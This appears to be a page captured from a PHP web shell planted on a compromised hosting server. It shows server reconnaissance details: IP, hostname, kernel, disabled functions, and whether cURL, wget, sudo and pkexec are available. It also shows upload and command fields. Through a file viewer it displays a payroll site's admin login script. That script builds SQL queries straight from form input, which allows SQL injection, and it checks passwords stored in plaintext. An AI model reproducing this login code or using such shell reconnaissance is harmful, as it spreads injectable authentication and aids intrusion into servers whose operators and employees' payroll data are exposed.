X3ND1 GANTENG
Server IP : 108.163.255.210  /  Your IP : 18.222.118.236
Web Server : Apache
System : Linux blossom.urlnameserver.com 3.10.0-1160.80.1.el7.x86_64 #1 SMP Tue Nov 8 15:48:59 UTC 2022 x86_64
User :  ( 1172)
PHP Version : 7.2.34
Disable Function : eval,escapeshellarg,proc_close,proc_get_status,proc_nice,proc_open,symlink,system,pcntl_exec,getrusage,chown,chgp,closelog,openlog,syslog,define_syslog_variables,php_ini_loaded_file,getservbyname,getservbyport,posix_getgid,posix_getgrgid,proc_terminate,pfsockopen,apache_child_terminate,posix_mkfifo,posix_setpgid,posix_setuid,hypot,pg_host,pos,posix_access,posix_getcwd,posix_getservbyname,myshellexec,getpid,posix_getsid,posix_isatty,posix_kill,posix_mknod,posix_setgid,posix_setsid,posix_setuid,posix_times,posix_uname,ps_fill,posix_getpwuid,global,ini_restore,zip_open,zip_read,rar_open,bzopen,bzread,bzwrite,apache_get_modules,apache_get_version,phpversionphpinfo,php_ini_scanned_files,get_current_user,disk_total_space,diskfreespace,leak,imap_list,hypo,filedump,safe_mode,getmygid,apache_getenv,apache_setenv,bzread,bzwrite,bzopen,phpini,higlight_file,dos_conv,get_cwd,er_log,cmd,e_name,vdir,get_dir,only_read,ftok,ftpexec,posix_getpwnam,mysql_list_dbs,disk_free_space,session_save_path,confirm_phpdoc_compiled,zip_entry_rea,php_u,psockopen,crack_opendict,crack_getlastmessage,crack_closedict,crack_check,fpassthru,posix_get_last_error,posix_getlogin,posix_getgroups,posix_strerror,posix_getrlimit,posix_getpgrp,posix_getgrnam,pos,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/unilinki/public_html/payroll/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ BERANDA ]     

Current File : /home/unilinki/public_html/payroll/admin/checkandgo.php
<?php
session_start();
include("../include/db.php");
$uid=md5(uniqid(rand()));
if($_POST["login"]=='login')
{
	$name=$_POST["user_name"];
	$pass=$_POST["Password"];
    $sql1="select * from admin where username='$name'"; 
	$res1=mysql_query($sql1) or die("Query not executed".mysql_error());
	$tot1=mysql_num_rows($res1);
	 $sql2="select * from employee where id='$name'"; 
	$res2=mysql_query($sql2) or die("Query not executed".mysql_error());
	$tot2=mysql_num_rows($res2);

	if($tot1 !="0")
	{
		
		$pwd=mysql_result($res1,0,'password');
		$admin_email=mysql_result($res1,0,'useremail');
		$admin_image=mysql_result($res1,0,'userimage');
		$admin_id=mysql_result($res1,0,'admin_id');
		$first_name=mysql_result($res1,0,'first_name');
		$last_name=mysql_result($res1,0,'last_name');
		$role_id=mysql_result($res1,0,'roleid');
		$branch=mysql_result($res1,0,'branch');
		$login_counter=mysql_result($res1,0,'login_counter');
		if(strcmp($pass,$pwd)=="0")
			{
				$_SESSION['first_name']=$first_name." ".$last_name;
				$_SESSION['admin_id']=$admin_id;
				$_SESSION['adminuser']=$name;
				$_SESSION['admin_email']=$admin_email;
				$_SESSION['role_id']=$role_id;
				$_SESSION['branch']=$branch;
				$_SESSION['login_counter']=$login_counter;
			
		   ?>
		  	<script language="javascript">
				location.href="dashboard.php?uid=<?php echo $uid?>";	
		  	</script>	
	<?php 	}else{
		   ?>
		  	<script language="javascript">
				location.href="login.php?uid=<?php echo $uid?>&message=invalidpassword";	
			</script>	
		  <?php
			}
	}
	elseif($tot2 !="0")
	{
		$pwd=mysql_result($res2,0,'password');
		$admin_email=mysql_result($res2,0,'emailid');
		$admin_id=mysql_result($res2,0,'id');
		$first_name=mysql_result($res2,0,'name');
		$branch=mysql_result($res2,0,'company');
		$login_counter1=mysql_result($res2,0,'login_counter');
		if(strcmp($pass,$pwd)=="0")
			{
				$_SESSION['first_name']=$first_name;
				$_SESSION['admin_id']=$admin_id;
				$_SESSION['id']=$name;
				$_SESSION['adminuser']=$name;
				//$_SESSION['admin_email']=$admin_email;
				$_SESSION['role_id']="emp";
				$_SESSION['branch']=$branch;
				$_SESSION['login_counter']=$login_counter1;
			
		   ?>
		  	<script language="javascript">
				location.href="salary_slip.php?uid=<?php echo $uid?>";	
		  	</script>	
	<?php 	}else{
		   ?>
		  	<script language="javascript">
				location.href="login.php?uid=<?php echo $uid?>&message=invalidpassword";	
			</script>	
		  <?php
			}
			
			
	}
	else
	{
	?>
	  	<script language="javascript">
			location.href="login.php?uid=<?php echo $uid?>&message=norecord";	
		</script>	
		 <?php
	}
}
?>

Anon7 - 2022
SCDN GOK